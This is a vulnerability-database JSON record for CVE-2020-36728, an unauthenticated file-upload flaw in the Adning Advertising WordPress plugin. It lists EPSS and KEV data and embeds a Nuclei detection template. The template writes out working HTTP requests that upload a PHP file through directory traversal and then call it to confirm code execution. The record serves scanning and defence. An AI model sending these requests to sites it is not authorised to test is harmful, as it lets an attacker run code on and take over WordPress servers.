{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-36728/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-36728/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-36728/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-36728/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-36728/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-36728"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-36728"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.03133,
      "kev": false,
      "percentile": 0.87332
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-36728.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2020-36728\n\ninfo:\n  name: WordPress Plugin Adning Advertising < 1.5.6 - Arbitrary File Upload\n  author: iamnoooob,pdresearch\n  severity: medium\n  description: |\n    The Adning Advertising plugin for WordPress versions below 1.5.6 is vulnerable to arbitrary file upload, allowing attackers to upload malicious files to the server.\n  impact: |\n    Unauthenticated attackers can upload malicious files to achieve remote code execution, potentially compromising the entire WordPress site and server.\n  remediation: |\n    Upgrade to Adning Advertising version 1.5.6 or later.\n  reference:\n    - https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/\n    - https://blog.nintechnet.com/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild/\n    - https://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-36728\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2020-36728\n    epss-score: 0.03133\n    epss-percentile: 0.87332\n    cpe: cpe:2.3:a:tunasite:adning_advertising:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: tunasite\n    product: adning_advertising\n    framework: wordpress\n    fofa-query: body=\"served by Adning\"\n  tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce,vkev,vuln\n\nflow: http(1) && http(2)\n\nvariables:\n  marker: \"{{randstr}}\"\n  filename: \"{{randbase(8)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=b214a08e1c094defed15a5cc4c2285ee\n\n        --b214a08e1c094defed15a5cc4c2285ee\n        Content-Disposition: form-data; name=\"allowed_file_types\"\n\n        php,jpg,jpeg\n        --b214a08e1c094defed15a5cc4c2285ee\n        Content-Disposition: form-data; name=\"upload\"\n\n        {\"dir\": \"../\"}\n        --b214a08e1c094defed15a5cc4c2285ee\n        Content-Disposition: form-data; name=\"files[]\"; filename=\"{{filename}}.php\"\n\n        <?php  echo base64_decode($_GET[\"input\"]);?>\n        --b214a08e1c094defed15a5cc4c2285ee--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, '{{filename}}','tmp_name','grid_item','success')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /{{filename}}.php?input={{base64(marker)}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, '{{marker}}')\"\n        condition: and\n# digest: 490a0046304402205eb5b8b92efde1e94b71cf6024b4d40dd45949bc5e6e59ed6ec55b26c24ec77502207bd5fd21fe67f1d7ad6334900f1c033fa628799d78da502c8aed27ae1efa3af6:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-36728"
}